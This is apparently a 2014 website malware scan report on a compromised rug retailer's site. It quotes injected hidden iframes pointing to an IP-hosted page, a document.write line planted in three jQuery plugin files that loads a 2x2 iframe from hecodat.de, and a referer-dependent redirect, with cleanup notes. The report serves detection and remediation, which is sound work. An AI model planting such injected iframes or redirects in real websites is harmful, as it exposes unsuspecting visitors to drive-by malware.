Malicious/Suspicious Redirects
Request | Server response | Status |
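URL: http://starrorientalrugs.com/ (request imitating a visitor who arrives from a search engine) GET / HTTP/1.1 Host: starrorientalrugs.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Fri, 19 Sep 2014 11:34:25 GMT Location: http://hecodat.de/zwmd.html?h=2031784 Server: Apache Content-Length: 292 Content-Type: text/html; charset=iso-8859-1 | malicious |
Note: this 302 to hecodat.de was returned for a request carrying a search-engine Referer, whereas the same URL under "Scanned pages/files" is reported as 200 OK, so the redirect appears to depend on the request headers. A redirect of that kind does not show up when the site owner types the address directly, and it suggests a server-side change (on Apache, commonly rewrite rules in .htaccess or modified server-side code) in addition to the injected iframes listed below.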
Scanned pages/files
Request | Server response | Status |
http://starrorientalrugs.com/ | 200 OK Content-Length: 5881 Content-Type: text/html | malicious |
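Page code contains blacklisted domain: 176.31.24.102 ...[4300 bytes skipped]... </div><!--END OF NAVY AND CONTENT--> </div><!--END OF CONTENT WRAPPER--> <div class="footercopy" id="footer">© 2011 Starr Oriental Rugs</div> <!--Slides--><div id="supersized"></div> <iframe name=Twitter scrolling=auto frameborder=no align=center height=32 width=78 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 78x32 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=32 width=78 src=http://176.31.24.102/post.php?id=919113> | ||
Note: the blacklisted value is an IP address rather than a domain name. The same iframe (name=Twitter, src http://176.31.24.102/post.php?id=919113) sits immediately before </body> on every flagged HTML page in this report, and only its height and width differ from page to page (78x32 here, 82x4 on Decorative.html, 95x43 on Tibetans.html). A cleanup search or detection rule should therefore match on the src host and path, not on the exact tag text.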
https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js | 200 OK Content-Length: 77746 Content-Type: text/javascript | clean |
http://starrorientalrugs.com/js/effects.core.js | 200 OK Content-Length: 19324 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=2031784></iframe>');
;(function($) { $.effects = $.effects || {}; $.extend($.effects, { save: function(el, set) { for(var i=0;i<set.length;i++) { if(set[i] !== null) $.data(el[0], "ec.storage."+set[i], el[0].style[set[i]]); } }, restore: function(el, set) { for(var i=0;i<set.length;i++) { ...[middle of file omitted from this excerpt]... return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); })(jQuery); Antivirus reports:
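Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=2031784 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=2031784> | ||
Note: this iframe is written by the document.write call found inside the script file itself, so the .js files on the server were modified, not only the HTML pages. Each flagged script (effects.core.js, effects.slide.js, supersized.3.0.js) should be compared with a known-good copy of the library and replaced; cleaning the HTML alone leaves the 2x2 iframe in place.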
http://starrorientalrugs.com/js/effects.slide.js | 200 OK Content-Length: 1748 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=2031784></iframe>');
(function($) { $.effects.slide = function(o) { return this.queue(function() { var el = $(this), props = ['position','top','left']; var mode = $.effects.setMode(el, o.options.mode || 'show'); var direction = o.options.direction || 'left'; $.effects.save(el, props); el.show(); $. ...[middle of file omitted from this excerpt]... var animation = {}; animation[ref] = (mode == 'show' ? (motion == 'pos' ? '+=' : '-=') : (motion == 'pos' ? '-=' : '+=')) + distance; el.animate(animation, { queue: false, duration: o.duration, easing: o.options.easing, complete: function() { if(mode == 'hide') el.hide(); $.effects.restore(el, props); $.effects.removeWrapper(el); if(o.callback) o.callback.apply(this, arguments); el.dequeue(); }}); }); }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=2031784 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=2031784> | ||
http://starrorientalrugs.com/supersized.3.0.js | 200 OK Content-Length: 14684 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=2031784></iframe>');
(function($){ $.fn.supersized = function() { $.inAnimation = false; $.paused = false; var options = $.extend($.fn.supersized.defaults, $.fn.supersized.options); $.currentSlide = options.start_slide - 1; var imageLink = (options.slides[options.slides.le ...[middle of file omitted from this excerpt]... } $('#supersized').resizenow(); } $.fn.supersized.defaults = { startwidth: 4, startheight: 3, vertical_center: 1, slideshow: 1, navigation:1, thumbnail_navigation: 0, transition: 1, pause_hover: 0, slide_counter: 1, slide_captions: 1, slide_interval: 5000, start_slide: 1 }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=2031784 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=2031784> | ||
http://starrorientalrugs.com/Decorative.html | 200 OK Content-Length: 9442 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4458 bytes skipped]... ; <td width="260" height="20" valign="top"> </td> <td width="736" height="20"> </td> <td width="80" height="20"> </td> </tr> </table> </div> <!--END OF CONTENT WRAPPER--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=4 width=82 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 82x4 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=4 width=82 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/index.html | 200 OK Content-Length: 5881 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4300 bytes skipped]... </div><!--END OF NAVY AND CONTENT--> </div><!--END OF CONTENT WRAPPER--> <div class="footercopy" id="footer">© 2011 Starr Oriental Rugs</div> <!--Slides--><div id="supersized"></div> <iframe name=Twitter scrolling=auto frameborder=no align=center height=32 width=78 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 78x32 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=32 width=78 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/Tibetans.html | 200 OK Content-Length: 12510 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4445 bytes skipped]... ;/td> <td width="260" height="20" valign="top"> </td> <td width="736" height="20"> </td> <td width="80" height="20"> </td> </tr> </table> </div> <!--END OF CONTENT WRAPPER--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=43 width=95 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 95x43 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=43 width=95 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/Antique.html | 200 OK Content-Length: 7696 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4456 bytes skipped]... <td width="260" height="20" valign="top"> </td> <td width="736" height="20"> </td> <td width="80" height="20"> </td> </tr> </table> </div> <!--END OF CONTENT WRAPPER--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=70 width=61 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 61x70 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=70 width=61 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/Custom.html | 200 OK Content-Length: 7545 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4424 bytes skipped]... > </td> <td width="260" height="20" valign="top"> </td> <td width="736" height="20"> </td> <td width="80" height="20"> </td> </tr> </table> </div><!--END OF CONTENT WRAPPER--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=4 width=87 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 87x4 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=4 width=87 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/AboutUs.html | 200 OK Content-Length: 7375 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4477 bytes skipped]... ;nbsp;</td> <td width="260" height="20" valign="top"> </td> <td width="736" height="20"> </td> <td width="80" height="20"> </td> </tr> </table> </div><!--END OF CONTENT WRAPPER--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=28 width=82 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 82x28 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=28 width=82 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/Contact.html | 200 OK Content-Length: 8606 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 176.31.24.102 ...[4574 bytes skipped]... d> <td width="260" height="20" valign="top"> </td> <td width="736" height="20"> </td> <td width="80" height="20"> </td> </tr> </table> </div> <!--END OF CONTENT WRAPPER--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=46 width=98 src=http://176.31.24.102/post.php?id=919113></iframe></body> </html> Malicious iFrame found. size: 98x46 src: http://176.31.24.102/post.php?id=919113 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=46 width=98 src=http://176.31.24.102/post.php?id=919113> | ||
http://starrorientalrugs.com/test404page.js | 404 Not Found Content-Length: 2673 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://starrorientalrugs.com/Decorative Aubussons.html | 200 OK Content-Length: 24150 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=starrorientalrugs.com
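Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Note: this result is for starrorientalrugs.com itself. The iframe destination http://176.31.24.102/post.php?id=919113 is reported above as marked suspicious by Google, and the scan found injected content on the site, so an unlisted status here should not be read as the site being clean.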
Query: http://yandex.com/infected?l10n=en&url=http://starrorientalrugs.com/
Result: starrorientalrugs.com is not infected or malware details are not published yet.
Result: starrorientalrugs.com is not infected or malware details are not published yet.